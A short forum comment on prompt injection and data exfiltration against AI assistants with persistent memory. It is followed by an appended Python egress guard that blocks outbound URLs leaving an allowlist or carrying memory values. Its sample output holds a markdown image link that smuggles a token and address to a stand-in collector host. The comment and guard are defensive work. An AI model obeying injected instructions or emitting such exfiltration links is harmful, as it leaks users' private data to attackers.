by loocorez
631 days ago
I don’t think running it locally solves this issue at all (though I agree with the sentiment of your comment). If the local AI will follow instructions stored in the user’s documents and has similar memory persistence, it doesn’t matter if it’s hosted in the cloud or run locally; prompt injection + data exfiltration is still a threat that needs to be mitigated. If anything, at least the cloud provider has some incentive/resources to detect an issue like this (not saying they do, but they could).

It is no different from a remote code execution vuln, except instead of code, it’s instructions.
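The mitigation the comment asks for is the same whether the model runs locally or in the cloud: treat whatever the model proposes to send out as untrusted, and check it against what the agent's persistent memory holds. The following is an added example, not code from the commenter or from any product mentioned in the thread. It assumes a constructed allowlist of hosts the agent may contact and a constructed in-memory store of sensitive fields; the model output it scans is also constructed for the demonstration.

```python
"""Egress guard for an LLM agent: flag outbound URLs that leave the allowlist
or that carry values from the agent's persistent memory.

Added example (hypothetical names, constructed data); not the thread's code.
"""
import re
from urllib.parse import urlparse, unquote

# Constructed allowlist: the only hosts the agent is permitted to reach.
ALLOWED_HOSTS = {"api.example-internal.test"}

# Constructed stand-in for the agent's persistent memory; in a real agent this
# is whatever the memory store has accumulated across sessions.
MEMORY = {
    "api_token": "tok_5f3a9c",
    "home_address": "12 Sample Street",
}

# Matches http(s) URLs in free text, stopping at whitespace and common
# markdown/HTML closers so "![img](https://...)" yields just the URL.
URL_RE = re.compile(r"https?://[^\s)\]>'\"]+")


def _leaked_fields(url, memory):
    """Return memory keys whose value appears in the (percent-decoded) URL."""
    decoded = unquote(url)
    return [key for key, value in memory.items() if value in decoded]


def check_outbound(url, memory=MEMORY, allowed=ALLOWED_HOSTS):
    """Decide whether a single proposed outbound URL may be fetched.

    Returns (allowed: bool, reasons: list[str]); reasons is empty when allowed.
    Both checks run so a log line shows every policy the URL violated.
    """
    host = (urlparse(url).hostname or "").lower()
    reasons = []
    if host not in allowed:
        reasons.append(f"host {host!r} not in allowlist")
    leaked = _leaked_fields(url, memory)
    if leaked:
        reasons.append("url carries memory fields: " + ", ".join(leaked))
    return (not reasons, reasons)


def scan_model_output(text, memory=MEMORY, allowed=ALLOWED_HOSTS):
    """Scan model output (before rendering or tool dispatch) and return the
    list of (url, reasons) that must be blocked."""
    findings = []
    for url in URL_RE.findall(text):
        ok, reasons = check_outbound(url, memory, allowed)
        if not ok:
            findings.append((url, reasons))
    return findings


# Constructed sample output: a benign source link plus a markdown image whose
# query string smuggles two memory values to an unknown host.
SAMPLE_OUTPUT = (
    "Here is your summary.\n"
    "![status](https://collector.unknown-host.test/i.png"
    "?d=tok_5f3a9c&a=12%20Sample%20Street)\n"
    "Source: https://api.example-internal.test/v1/docs/42"
)

if __name__ == "__main__":
    for url, reasons in scan_model_output(SAMPLE_OUTPUT):
        print("BLOCK", url)
        for r in reasons:
            print("   -", r)
```

The guard only decodes percent-encoding; an exfiltration channel that base64-encodes or splits memory values across several requests would need additional normalisation or per-request volume limits, which is why the allowlist check runs alongside the content check rather than instead of it.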